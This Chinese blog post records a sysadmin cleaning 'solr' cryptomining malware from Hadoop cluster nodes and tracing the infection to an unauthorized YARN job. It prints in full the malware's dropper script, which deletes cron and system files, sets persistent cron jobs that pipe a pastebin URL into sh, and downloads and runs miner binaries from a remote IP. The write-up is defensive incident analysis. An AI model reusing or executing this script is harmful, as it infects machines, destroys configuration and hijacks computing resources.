清除挖矿病毒solr记录

已于 2023-02-23 12:29:54 修改
阅读量1.4k 收藏 2
点赞数 1
分类专栏: shell  大数据 文章标签: solr linux 运维
于 2023-02-20 10:17:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flye/article/details/129118667
版权

问题场景:

周一早上查看grafana,少了三个节点的信息,启动后,发现三个节点的cpu告警,随后节点又挂了。

正常情况下,一般node节点不会挂掉,查看节点hadoop相关进程,一切正常。

问题描述

提示:挖矿病毒solr进程,占用cpu 100%,直接杀掉了node节点,监控不告警。

节点cpu使用率99%:

启动node_exporter

prometheus 节点cpu告警。
原因分析: 

提示:使用top查看

 果然发现异常进程

解决方案:

提示:找到文件路径,并找到定时任务。

1、杀进程,删除文件目录

 2、crontab -e  发现定时执行脚本,注释掉。

#*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh

发现五分钟执行一次,注释掉
 

 3、下载下来看看

#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "xg546sAd" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh"
  ) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ];
then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
rm -rf /tmp/.solr
mkdir /tmp/.solr
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    rm -rf /tmp/.solr
    mkdir /tmp/.solr
    chmod +rwx /tmp/.solr
    curl -fsSL http://45.144.3.216:10000/starrail/config/config.json -o /tmp/.solr/config.json
    curl -fsSL http://45.144.3.216:10000/starrail/cbt2zip/setup.exe -o /tmp/.solr/solrd
    curl -fsSL http://45.144.3.216:10000/solr.sh -o /tmp/.solr/solr.sh
    curl -fsSL http://45.144.3.216:10000/genshin -o /tmp/.solr/genshin
    chmod +x /tmp/.solr/genshin
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi

4、病毒清理后,prometheus 告警解除。

 至此,病毒彻底清理。再持续观察几天看看。

后记:2023-02-23通过grafana 查看hadoop集群网卡流量异常,根据经验,应该有yarn任务执行导致,查看hadoop集群任务界面,发现有异常的任务,dr.who用户执行yarn 任务

一般情况下,我们的集群任务是特定用户,比如hadoop,hue,hive,aliyun等,而dr.who是hadoop 集群的默认用户,所以,直接先使用命令杀掉

yarn application -kill application_1667455867992_91447


查看日志:

yarn logs -applicationId application_1667455867992_91447

竟然没有任何日志.

发现这个dr.who用户,在2023年02月17日,2023年02月21日都有执行相同的任务;

查看 grafana node_exporter挂掉的节点近七天的cpu曲线:

yarn 任务的task节点:

正好三台被植入了病毒,致使node_exporter挂掉。

初步得出结论:病毒通过远程执行yarn任务植入task节点,并创建定时任务,定时从网站拉取病毒代码并执行,病毒运行期间,耗费大量的cpu资源,致使node_exporter挂掉,prometheus 不报警。

目前还未查到如何执行的yarn任务,以及yarn任务的脚本,持续跟进,有相关经验的小伙伴也可以一起分享讨论。

病毒真是无孔不入,记得上次有个mar 病毒,清理后没有在发现。今天又发现这个solr病毒,大家在集群运维时也要注意细节,有异常及早发现并处理,避免出现故障。

冰帆<
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
06solr 文件删除
千寻的博客
03-23 1951
Apache Solr 存在任意文件删除漏洞,在目前的最新版本(8.8.2)中仍然未被修复,漏洞的根本成因是函数 ****对要删除的文件名并未做校验。同时 Apache Solr Config Api 对外开放,导致任意用户可修改配置,造成危害。
继续深挖挖矿病毒solr中毒途径
flye的专栏
02-23 488
今天突然通过grafana 集群的网卡流量异常,查看hadoop集群有dr.who用户执行yarn 任务。
confluence挖矿病毒(kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3554
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
记录清除挖矿病毒 solrd 过程
最新发布
爱摄影的小章同学的博客
06-12 584
删除完成发现 所有进程都不见了,此时吓懵了,因为是现网,产线还有很多消息正在往kafka里写数据,。端午节期间,kafka 服务器被黑客攻击了,植入了挖矿病毒 solrd,这个病毒很聪明,内存,CPU并没有异常升高,以致于上班第一天完全没有察觉。此时看到消费kafka 服务都还在,没有注意到第一行的 /tmp/.solr/solrd 病毒,此时它还没有占用多少CPU跟内存。刚kill 完成 再次top -c 发现这个病毒有换了一个进程的id 又起来了,试了几次都没用,于是 查到病毒执行的文件夹。
linux服务器 kdevtmpfsi solrd 病毒处理 记住一定要多删除几次。重启
Super_man54188的博客
02-20 1148
所有中病毒 无非是cpu内存占用高 一定要断公网地址 修改root密码 删除history历史记录 history -c 映射端口也要注意 solrd病毒 公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程 然后grep这个进程的进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊...
挖矿病毒清除记录
ufsoko的博客
11-27 914
挖矿病毒清除记录出现现象查看定时任务开始解决目前还存在三个问题: 出现现象 cpu是4核的但使用htop无法查看到,之前跑的服务进程都被kill掉了,重新启动服务依然被kill掉。 查看定时任务 crontab -l 会出现如下这些curl请求一个域名里面的数据并且下载脚本只需,清除之后还是会存在。 开始解决 于是乎我先把/etc/hosts 加上了一个 127.0.0.1 aliyun.on...
sola病毒的手工杀除
心在天的专栏
10-21 2073
sola病毒的手工杀除 sola病毒会将图片,txt文本文件,后缀名为doc的word文档转换为exe文件。用江民杀毒软件检测不出来,但升级到5月25号以后的卡巴斯基可以查到,但是卡巴会将感染的word文档、图片以及文本文件一起删除!我想所有的人都不想把自己辛辛苦苦做出来的东西,或者精心搜藏的图片,就这么给丢失掉。有什么方法可以即保存了文件,又把病毒给杀除了呢?可以
golang 日志分析_Linux挖矿病毒清除与分析
weixin_39846289的博客
12-04 369
起因舍友在宿舍喊着,这服务器好卡啊,难受啊!我调侃他是不是被挖矿了,top命令看一下CPU占用。一看吓一跳,一个叫做sysupdate的进程占据了绝大部分的CPU资源。CPU使用率接近100%。看来被挖矿是坐实了。清除过程确定病因这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们...
执行sh文件_【漏洞通告】Apache Solr远程代码执行漏洞
weixin_39581972的博客
11-24 178
1.综述Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr存在远程代码执行漏洞,该漏洞源于默认配置文件solr.in.sh中包含ENABLE_REMOTE_JMX_OPTS配置选项的不安全设置。2.漏洞概述漏洞类型:远程代码执行漏洞危险等级: 高危受影响系统: ...
solr8使用solrJ查询数据使用记录
01-07
1.下载solr 下载地址 http://www.apache.org/dyn/closer.lua/lucene/solr/8.0.0 windows下载zip,linux下载tgz 下载完解压 2.solr启动&停止 solr-8.0.0\bin目录下执行cmd solr start 启动 solr stop -all 3.创建solr...
solr_solr_
10-02
Solr,全称为Apache Solr,是一款开源的企业级搜索平台,由Apache软件基金会维护。它基于Java,并且是Lucene库的一个高级搜索应用。Solr主要用于处理和索引大量文本数据,提供高效的全文检索、拼写检查、命中高亮、...
solr-dataimporthandler-8.11.2.jar
03-11
solr 检索用包
Solr定时更新Solr定时更新
05-05
Solr,全名Apache Solr,是一款开源的企业级搜索引擎,基于Java且高度可扩展。它在处理大量数据和提供高效搜索性能方面表现出色。而定时更新功能是Solr的一个重要特性,它允许用户定期地、自动地从数据源导入新数据...
solr服务器_solr_
10-02
Solr服务器是Apache Lucene项目的一个子项目,是一款开源的企业级搜索平台,专门用于处理大量文本数据的全文检索、搜索和分析。它基于Java开发,能够处理多种数据源,包括XML、JSON、CSV等,提供了高效、可扩展的...
Solr基本概念杂谈
随-记的专栏
12-21 1948
摘要: 在使用Solr之前,有必要对solr的基本概念有所认识,本文基于官方文档整理了solr有关文档(Documents)、字段(Fields)、模式(Schema)。 首先,你提供很多的信息,然后你想从这些信息中找到你想要的某个信息点。Solr做的事很简单,帮你找想要的信息。提供信息的过程称之为indexing(索引),找信息的过程称之为query(检索)。 一个场景要理解Solr的工作,想
solr解决访问安全
fengyong7723131的专栏
11-27 4728
Tomcat7,solr3.6,mmseg1.8 1:环境的搭建 1:解压tomcat,solr,mmseg4j 2:复制dist文件夹下apache-solr.war到tomcat的webapp文件夹下,修改文件名为solr(不该也行,这里修改文件名方便一会地址栏的输入) 3:创建solr-tomcat文件夹作为solr的根目录 4:tomcat/conf/Catalina/local
Hadoop漏洞被传挖矿病毒(/tmp/kdevtmpfsi kinsing)
lucas5的博客
12-21 356
大数据服务器,被病毒挖矿
挖矿病毒清理
chunhua1026的专栏
09-01 2534
前言: 今天登录vCenter,发现公司虚机一片告警,很罕见的场景~ 操作步骤: 首先通过SecureCRT或XShell登录目标虚机,也可通过cmd窗口:ssh root@10.6.6.*登录。 查看是否中毒,执行top命令 本次以10.6.6.52这台虚机为例,cpu 4核,如下图所示,这是中了挖矿病毒的截图,第1个进程将4核cpu全部占满,command为一段随机字符串。如果top显示并没有此进程,恭喜你并未中招,下面的章节忽略就好。 另一个检查方法,查看是否有此文件:/opt/unixdb
Solr实战:探索Solr 4.7版
"solr in action" 《Solr in Action》是一本专注于Solr实战的书籍,由Trey Grainger和Timothy Potter撰写,特别推荐给正在或即将使用Solr 4.7版本的IT专业人士。Solr是一款流行的开源全文搜索引擎,它提供了强大的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰帆<

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值